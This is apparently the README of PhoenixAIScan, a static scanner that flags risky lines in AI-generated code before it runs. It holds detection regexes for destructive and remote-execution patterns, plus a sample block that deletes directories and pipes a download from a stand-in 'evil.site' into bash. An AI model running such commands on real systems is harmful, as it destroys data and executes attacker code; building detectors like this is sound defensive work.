## Overview
PhoenixAIScan is a pre-execution security tool designed to help developers safely run AI-generated code. It scans code before execution, detects dangerous operations, highlights risky lines, and explains the impact in plain English.
The project addresses a growing real-world problem: developers increasingly copy-paste AI-generated code and execute it blindly, leading to accidental data loss, system damage, and security breaches.
PhoenixAIScan acts as a security checkpoint between AI output and execution.
## Problem Statement
With the rise of vibe coding and AI-assisted development:
- Developers often skip manual code review
- AI can generate destructive commands like `rm -rf` and `DROP TABLE`
- System-level operations and insecure execution patterns go unnoticed
- Users blame AI when systems break, even though the risk was visible in the code
### Existing Gaps
- Linters focus on syntax and style, not execution danger
- Security tools are heavy, complex, and mostly post-execution
- No simple tool answers the question: "What will happen if I run this?"
## Solution
PhoenixAIScan provides a lightweight, fast, pre-execution risk scanner that:
- Accepts pasted code or uploaded files
- Automatically detects the programming language
- Scans code using security-focused static analysis rules
- Highlights dangerous lines visually
- Explains risks in plain English
- Assigns a risk score and severity level
The goal is not to block execution, but to make risk obvious before damage happens.
## Key Features
### Code Scanning
- Paste AI-generated code
- Upload files (`.py`, `.sh`, `.js`, `.sql`)
### Auto Language Detection
- No manual language selection required
- Detects language based on syntax and filename
### Risk Detection Categories
- Destructive file operations
- System-level command execution
- Database destruction
- Unsafe permission changes
- Remote code execution patterns
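These categories map naturally onto a rule table. The sketch below is in the spirit of the private `rules.py`; the rule IDs, patterns, and severities are assumptions, not the actual rule set:

```python
# Illustrative rule table for the categories above. The real rules.py is
# private; IDs, regexes, and severities here are assumptions.
import re

RULES = [
    {"id": "destructive-file-op", "severity": "CRITICAL",
     "pattern": re.compile(r"\brm\s+-rf\b|shutil\.rmtree"),
     "explanation": "Deletes files or directories permanently."},
    {"id": "system-exec", "severity": "HIGH",
     "pattern": re.compile(r"os\.system|subprocess\.(Popen|run|call)"),
     "explanation": "Executes system-level commands."},
    {"id": "db-destruction", "severity": "CRITICAL",
     "pattern": re.compile(r"\bDROP\s+(TABLE|DATABASE)\b", re.I),
     "explanation": "Destroys database tables or schemas."},
    {"id": "unsafe-permissions", "severity": "MEDIUM",
     "pattern": re.compile(r"chmod\s+777|os\.chmod\([^)]*0o777"),
     "explanation": "Grants world-writable permissions."},
    {"id": "remote-exec", "severity": "CRITICAL",
     "pattern": re.compile(r"(curl|wget)[^|\n]*\|\s*(ba)?sh"),
     "explanation": "Pipes remote content into a shell."},
]

def scan_line(line: str) -> list[dict]:
    """Return every rule that matches a single line of code."""
    return [rule for rule in RULES if rule["pattern"].search(line)]
```

Keeping each rule as data (pattern + severity + plain-English explanation) is what makes the explanations and the extensibility cheap: adding a category is one new dictionary entry.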
### Line-Level Highlighting
- Dangerous lines highlighted in red / orange
- Auto-scroll to the first critical issue
### Risk Scoring
- Score from 0 to 10
- Severity levels: SAFE, MEDIUM, HIGH, CRITICAL
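One plausible way to turn per-line findings into a single 0–10 score and a severity label is a weighted maximum. The real `risk_engine.py` is private, so the weights and thresholds below are assumptions:

```python
# Sketch of score aggregation. The real risk_engine.py is private;
# weights and thresholds here are assumptions.
SEVERITY_WEIGHT = {"MEDIUM": 3, "HIGH": 6, "CRITICAL": 10}

def risk_score(findings: list[str]) -> tuple[int, str]:
    """findings: severity strings, one per matched rule."""
    if not findings:
        return 0, "SAFE"
    # The worst single finding dominates: one CRITICAL hit is enough
    # to flag the whole snippet.
    score = max(SEVERITY_WEIGHT[s] for s in findings)
    if score >= 9:
        level = "CRITICAL"
    elif score >= 6:
        level = "HIGH"
    else:
        level = "MEDIUM"
    return score, level
```

Using a maximum rather than a sum keeps the score stable: ten cosmetic warnings never outrank one destructive command.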
### Human-Readable Explanations
> "This line deletes an entire directory and all its contents permanently."
## Supported Languages
- Python
- Bash / Shell
- JavaScript (Node.js)
- SQL
Designed to be extensible for future languages.
## System Architecture
### Frontend (Public)
- HTML, CSS, Vanilla JavaScript
- Dark security-themed UI
- Hosted on GitHub Pages
### Backend (Private)
- Python + FastAPI
- Rule-based static analysis engine
- Hosted on Render
- Source code kept private for IP protection
### Communication
- REST API over HTTPS
- Frontend communicates only via exposed endpoints
## Project Structure
```
PhoenixAIScan/
├── index.html
├── style.css
├── script.js
└── README.md

PhoenixAIScan-backend/   (private)
├── main.py
├── scanner/
│   ├── rules.py
│   ├── scanner.py
│   └── risk_engine.py
├── utils/
│   └── language_detect.py
└── requirements.txt
```
## How It Works (Technical Flow)
1. User submits code (paste or file upload)
2. Backend detects the language and applies rule-based scanning
3. Risk engine assigns severity and aggregates a risk score
4. Frontend displays the score, severity badge, and highlighted lines
All scanning is static: no code is ever executed.
## Example Detection
```python
os.system("rm -rf /tmp/data")
shutil.rmtree("/home/user/files")
subprocess.Popen("curl http://evil.site | bash", shell=True)
```

**Risk Score: 10 / 10 | Severity: CRITICAL**
- Executes system-level commands
- Deletes directories permanently
- Executes remote code
## Deployment Strategy
### Frontend
- GitHub Pages (public)
- Instant global access
### Backend
- Render (free tier)
- Private repository
- Secure API exposure only
This mirrors real startup architecture: public UI + protected backend logic.
## Security Considerations
- Backend source code kept private
- No code execution on server
- Input sanitized and decoded safely
- No persistence of user-submitted code
## Roadmap
- Credential / API key leak detection
- Reverse shell detection
- Exportable scan reports (PDF / JSON)
- Advanced persistence detection
- ML-assisted contextual risk reasoning
## Key Learnings
- AI-generated code introduces new security risks
- Developers need explainable security, not just warnings
- Focused static analysis can be extremely powerful
- UX matters as much as detection in security tooling
## Author
Aayush Pandey
Security-focused developer exploring AI safety, automation, and application security.
## Conclusion
PhoenixAIScan demonstrates how AI safety tooling can be simple, fast, explainable, and developer-friendly. It shifts security left, preventing damage before execution, especially in an era where AI code generation is becoming the norm.
*PhoenixAIScan: because blind execution burns.*